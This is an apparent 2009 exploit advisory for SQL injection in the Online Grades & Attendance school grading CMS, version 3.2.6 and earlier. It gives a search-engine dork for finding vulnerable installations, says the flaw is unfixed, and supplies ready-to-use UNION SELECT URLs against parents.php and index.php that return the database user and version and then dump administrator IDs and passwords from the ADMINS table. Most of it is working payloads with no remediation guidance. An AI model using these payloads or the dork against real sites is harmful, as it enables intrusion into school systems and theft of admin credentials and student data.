Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21921
HistoryJun 01, 2009 - 12:00 a.m.

MULTIPLE SQL INJECTION VULNERABILITIES -- Online Grades & Attendance v-3.2.6 -->

2009-06-0100:00:00
vulners.com
110

MULTIPLE SQL INJECTION VULNERABILITIES – Online Grades & Attendance v-3.2.6 –>

CMS INFORMATION:

–>WEB: http://www.onlinegrades.org/
–>DOWNLOAD: http://www.onlinegrades.org/
–>DEMO: http://www.onlinegrades.org/demo_info
–>CATEGORY: CMS / Education
–>DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same
features plus many new features. OG is a web based grade…
–>RELEASED: 2009-02-05

CMS VULNERABILITY:

–>TESTED ON: firefox 3
–>DORK: "Powered by Online Grades"
–>CATEGORY: SQL INJECTION
–>AFFECT VERSION: <= 3.2.6
–>Discovered Bug date: 2009-05-21
–>Reported Bug date: 2009-05-21
–>Fixed bug date: Not fixed
–>Info patch: Not fixed
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


PROOFS OF CONCEPT:

<<<<---------++++++++++++++ Condition: magic quotes=OFF ++++++++++++++++±-------->>>>

<<<<---------++++++++ Condition: Be a registered user: Parent, Student or faculty
+++++++++±-------->>>>

[++] GET var –> 'ADD'

[++] File vuln –> 'parents.php'

http://[HOST]/[PATH]/parents/parents.php?func=mailto&amp;ADD=-1&#37;27+UNION+ALL+SELECT+user&#40;&#41;&#37;23


&lt;&lt;&lt;&lt;---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++---------&gt;&gt;&gt;&gt;


[++] GET var --&gt; &#39;key&#39;

[++] File vuln --&gt; &#39;index.php&#39;


~~~~~&gt;
http://[HOST]/[PATH]/?action=resetpass&amp;key=-1&#37;27+UNION+ALL+SELECT+1,version&#40;&#41;,3,4,5,6,7,8,9,10,11&#37;23


[++[Return]++] ~~~~~&gt; user or version in DB.


----------
EXPLOITS:
----------


~~~~~&gt;
http://[HOST]/[PATH]/parents/parents.php?func=mailto&amp;ADD=-1&#37;27+UNION+ALL+SELECT+concat&#40;client_id,0x3A3A3A,client_pw&#41;+FROM+ADMINS+WHERE+id=&#37;271

~~~~~&gt;
http://[HOST]/[PATH]/?action=resetpass&amp;key=-1&#37;27+UNION+ALL+SELECT+1,concat&#40;client_id,0x3A3A3A,client_pw&#41;,3,4,5,6,7,8,9,10,11+FROM+ADMINS+WHERE+id=1&#37;23


[++[Return]++] ~~~~~&gt; client_id:::client_pw in &#39;ADMINS&#39; table



#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################